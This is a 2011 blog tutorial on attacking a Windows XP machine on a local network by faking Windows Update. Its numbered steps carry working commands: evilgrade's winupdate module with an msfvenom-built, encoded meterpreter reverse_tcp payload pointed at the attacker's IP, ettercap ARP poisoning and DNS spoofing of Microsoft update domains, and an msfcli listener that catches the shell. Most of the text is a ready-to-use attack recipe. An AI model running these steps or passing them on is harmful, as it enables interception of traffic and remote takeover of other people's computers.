Monday, August 15, 2011

Hacking with Evilgrade on Backtrack5


After install evilgrade on Backtrack5(Tutorial how to install evilgrade on Backtrack5). Now we try to use it. And this tutorial, we will use the new Metasploit tool name's "msfvenom" to create the shell and use it to pwn victim. You can download this tutorial document and my ettercap-ng that was compiled by myself in the last of this post.

Attacker IP: 192.168.168.156 [Backtrack 5 Gnome Desktop 64Bit]
Victim IP: 192.168.168.159 [Windows XP SP2]

1. Go to path of evilgrade and run it.
   $ cd /pentest/exploits/isr-evilgrade 
   $ ./evilgrade 

2. After load all modules, you can list all modules with command.
   evilgrade> show modules

3. Pick the modules that you want to spoof, in this tutorial I pick the "winupdate". to pwing victim machine who want to update his windows 
   evilgrade> configure winupdate


4. Show options of this module.
   evilgrade(winupdate)> show options

5. Set the agent for run when victim request windows update. This step, we use msfvenom to create and encode the payload.
   evilgrade(winupdate)> set agent '["/pentest/exploits/framework3/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.168.156 LPORT=445 -f exe  1> <%OUT%>/tmp/windowsupdate.exe<%OUT%>"]'


6. Make sure that you don't have DNS service(port 53) on the host and the same port of LPORT in step#5 don't use.


7. Start the evilgrade server.
   evilgrade(winupdate)> start

8. Edit and set spoofing DNS resolving of "windowsupdate.microsoft.com","update.microsoft.com","www.microsoft.com","go.microsoft.com" in /usr/share/ettercap/etter.dns with any tool editors, like this picture.



9. Run ettercap with -G option for GUI.
   $ ettercap -G

10. Go to Sniff -> Unified Sniffing

11.Choose the interface you want to sniff.

12. Enable DNS Spoofing plugin with go to Plugins -> Manage the Plugins -> Double Click "dns_spoof"


13. Scan machine in the same network with go to Hosts -> Scan for hosts

14. View the hosts in network and set the victim with go to Hosts -> Hosts list -> Click Gateway IP and [Add to Target 1] -> Click Victim IP and [Add to Target 2]


15. Start to attack with go to Mitm -> Arp poisoning -> Click Sniff remote connections

16. Start Sniffing with go to Start -> Start Sniffing

*** If you get the message "Dissector "dns" not supported" from ettercap, fix with this tutorial
  1. Get the source from http://ettercap.sourceforge.net 
  
  2. Extract it with tar xzvf ettercap-ng-0.7.3.tar.gz


  3. Edit configure file
      -  in line 29472: ac_cv_search_dn_expand="-lresolv"
      -  in line 29669: if true; then
      -  in line 29676: ac_ec_dns=yes


  4. Edit src/ec_log.c file
      -  in line 193: fd->fd = open(filename, 0_CREAT | 0_TRUNC | 0_RDWR | 0_BINARY, 0666);
  5. Save and exit

  6. Compile and install it with ./configure && make && make install
  7. Change DNS Record in /usr/local/share/ettercap/etter.dns 


Source: http://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwebcache.googleusercontent.com%2Fsearch%3Fq%3Dcache%3AONv78qOlYGkJ%3Aunknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20%2520http%3A%2F%2Funknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20

17. Use Metasploit command's msfcli to create listening service from victim machine.
      $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=445 LHOST=192.168.168.156

18. In the victim machine, Try to update windows. it will redirect from windowsupdate.microsoft.com to Attacker machine. And popup for victim to download update file.

 

19.  When victim run the update file, we will get the meterpreter.